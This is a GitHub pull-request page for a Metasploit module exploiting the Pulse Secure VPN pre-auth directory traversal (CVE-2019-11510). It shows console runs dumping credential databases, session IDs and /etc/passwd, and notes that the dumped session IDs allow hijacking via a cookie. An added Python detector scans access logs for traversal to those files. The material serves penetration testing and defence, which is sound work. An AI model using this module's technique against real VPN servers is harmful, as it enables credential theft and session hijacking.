
Pulse Secure VPN arbitrary file disclosure (redux) #12511

Merged
merged 16 commits into from Nov 12, 2019

Conversation

@wvu-r7
Contributor

wvu-r7 commented Oct 30, 2019

WIP (delayed waiting on #12510 and #12517)

#12510 is merged, and #12517 is non-essential to moving this forward. We're lacking critical testing results to automate this to work with #12515, too. I had originally looped through the found SIDs, but it was inelegant and noisy. Using plaintext creds would have been nice.

This is a rewrite of #12220. Please see that ticket for relevant history.

This PR requires #12510 to avoid a ridiculously long timeout.

Information

msf5 auxiliary(gather/pulse_secure_file_disclosure) > info

       Name: Pulse Secure VPN Arbitrary File Disclosure
     Module: auxiliary/gather/pulse_secure_file_disclosure
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-04-24

Provided by:
  Orange Tsai
  Meh Chang
  Alyssa Herrera
  Justin Wagner
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Available actions:
  Name       Description
  ----       -----------
  Automatic  Dump creds and sessions
  Manual     Dump an arbitrary file (FILE option)

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FILE     /etc/passwd      yes       File to dump (manual mode only)
  PRINT    true             no        Print file contents (manual mode only)
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    443              yes       The target port (TCP)
  SSL      true             no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Description:
  This module exploits a pre-auth directory traversal in the Pulse
  Secure VPN server to dump an arbitrary file. Dumped files are stored
  in loot. If the "Automatic" action is set, plaintext and hashed
  credentials, as well as session IDs, will be dumped. Valid sessions
  can be hijacked by setting the "DSIG" browser cookie to a valid
  session ID. For the "Manual" action, please specify a file to dump
  via the "FILE" option. /etc/passwd will be dumped by default. If the
  "PRINT" option is set, file contents will be printed to the screen,
  with any unprintable characters replaced by a period. Please see
  related module exploit/linux/http/pulse_secure_cmd_exec for a
  post-auth exploit that can leverage the results from this module.

References:
  https://cvedetails.com/cve/CVE-2019-11510/
  https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
  https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
  https://hackerone.com/reports/591295

Related modules:
  exploit/linux/http/pulse_secure_cmd_exec

msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Automatic mode

msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in automatic mode
[*] Dumping /data/runtime/mtmp/lmdb/dataa/data.mdb
[+] /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
[*] Dumping /data/runtime/mtmp/lmdb/randomVal/data.mdb
[*] Parsing session IDs...
[+] Session ID found: df502e6052d9002d8f02160af8bfd055
[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
[+] Session ID found: acbef5625
[+] Session ID found: c145e683a
[+] Session ID found: fc6c097dd
[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
[+] Session ID found: c145e683a17cfacb72a47eb8b2515c14
[+] Session ID found: a7661751393e16fa253e97bd02dc2a4f
[+] Session ID found: 7e78ab276afea3f00dfa41892c437156c699eff8
[+] /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
[*] Dumping /data/runtime/mtmp/system
[+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot

Loot
====

host         service  type                                        name                                        content                   info                   path
----         -------  ----                                        ----                                        -------                   ----                   ----
[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/dataa/data.mdb      application/octet-stream  Plaintext credentials  /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/randomVal/data.mdb  application/octet-stream  Session IDs            /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/system                   application/octet-stream  Hashed credentials     /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin

msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Manual mode

msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual
action => Manual
msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >
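The module info above lists ioc-in-logs as a side effect, and the run output names the files the module reads (/etc/passwd, the two LMDB databases and /data/runtime/mtmp/system). The following is an added example from the defender's side; it is not part of this PR or of Metasploit Framework. It scans web-server access-log lines for traversal sequences (including percent-encoded and double-encoded forms) whose decoded path resolves to one of those files, and grades each hit by whether the server answered 200. The combined-log layout, the SAMPLE_LOG lines and the severity scheme are constructed for this example; the PR does not state the request path the module sends, so the detector keys on generic traversal plus the target file rather than on any specific URL.

```python
"""Flag directory-traversal requests aimed at the files the Pulse Secure module dumps.

Added example (editor's code, not the PR's). Log format, sample lines and
severity levels are assumptions made for the example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Files named in the module output above; a request that reaches one of these
# through traversal is the indicator the module leaves in access logs.
SENSITIVE_PATHS = (
    "/etc/passwd",
    "/data/runtime/mtmp/lmdb/dataa/data.mdb",
    "/data/runtime/mtmp/lmdb/randomVal/data.mdb",
    "/data/runtime/mtmp/system",
)

# Combined-log-format request line (assumed layout; adapt to your log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


@dataclass
class Finding:
    ip: str
    ts: str
    target: str
    status: int
    traversal: bool
    sensitive_path: Optional[str]

    @property
    def severity(self) -> str:
        # Constructed grading: traversal to a credential file that the server
        # actually served is the case worth paging on.
        if self.traversal and self.sensitive_path and self.status == 200:
            return "high"
        if self.traversal and self.sensitive_path:
            return "medium"
        if self.traversal or self.sensitive_path:
            return "low"
        return "none"


def fully_decode(target: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so double-encoded '..%252f' is caught too."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyse_target(target: str) -> Tuple[bool, Optional[str]]:
    """Return (traversal_present, matched_sensitive_path_or_None) for one request target."""
    path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
    traversal = any(seg == ".." for seg in path.split("/"))
    matched = next((p for p in SENSITIVE_PATHS if path.endswith(p)), None)
    return traversal, matched


def scan_log(lines: List[str]) -> List[Finding]:
    """Parse each line and keep only requests showing traversal or a sensitive file."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected layout; skip rather than guess
        traversal, matched = analyse_target(m["target"])
        if not (traversal or matched):
            continue
        findings.append(Finding(m["ip"], m["ts"], m["target"],
                                int(m["status"]), traversal, matched))
    return findings


# Constructed sample lines: a benign request, a successful traversal to /etc/passwd,
# a percent-encoded traversal to the session database, and one attempt that 404'd.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Oct/2019:22:18:40 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [29/Oct/2019:22:29:49 +0000] "GET /images/../../../../etc/passwd HTTP/1.1" 200 314',
    '203.0.113.5 - - [29/Oct/2019:22:18:45 +0000] "GET /static/..%2f..%2f..%2fdata/runtime/mtmp/lmdb/randomVal/data.mdb HTTP/1.1" 200 98304',
    '198.51.100.7 - - [29/Oct/2019:23:01:02 +0000] "GET /static/../../../etc/passwd HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.severity:6} {f.ip} {f.status} {f.target}")
```

Run it against exported access logs; a single source IP producing a "high" hit for one of the LMDB paths followed by authenticated activity is consistent with the session-hijack path the module description mentions (DSIG cookie set to a dumped session ID), and is the sequence to look for when triaging.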
0xDezzy and others added 9 commits Aug 21, 2019
@wvu-r7 wvu-r7 removed the needs-docs label Oct 30, 2019
@wvu-r7 wvu-r7 changed the title [WIP] Redux of Pulse Secure VPN arbitrary file disclosure Redux of Pulse Secure VPN arbitrary file disclosure Oct 30, 2019
@wvu-r7 wvu-r7 removed the delayed label Oct 30, 2019
@wvu-r7 wvu-r7 changed the title Redux of Pulse Secure VPN arbitrary file disclosure Pulse Secure VPN arbitrary file disclosure (redux) Oct 30, 2019
@wvu-r7 wvu-r7 mentioned this pull request Oct 31, 2019
@wvu-r7 wvu-r7 changed the title Pulse Secure VPN arbitrary file disclosure (redux) [WIP] Pulse Secure VPN arbitrary file disclosure (redux) Oct 31, 2019
@wvu-r7 wvu-r7 added the delayed label Oct 31, 2019
@wvu-r7 wvu-r7 changed the title [WIP] Pulse Secure VPN arbitrary file disclosure (redux) Pulse Secure VPN arbitrary file disclosure (redux) Nov 12, 2019
@wvu-r7 wvu-r7 removed the delayed label Nov 12, 2019
wvu-r7 added a commit that referenced this pull request Nov 12, 2019
@wvu-r7 wvu-r7 merged commit 5235759 into rapid7:master Nov 12, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 12, 2019
@wvu-r7

Contributor Author

wvu-r7 commented Nov 12, 2019

Release Notes

The pulse_secure_file_disclosure module has been added to the framework. It exploits a local file inclusion against Pulse Secure VPN servers, downloading credential data in automatic mode or an arbitrary file in manual mode.

@wvu-r7 wvu-r7 deleted the wvu-r7:pr/12220 branch Nov 12, 2019
@tdoan-r7 tdoan-r7 added the rn-modules label Dec 11, 2019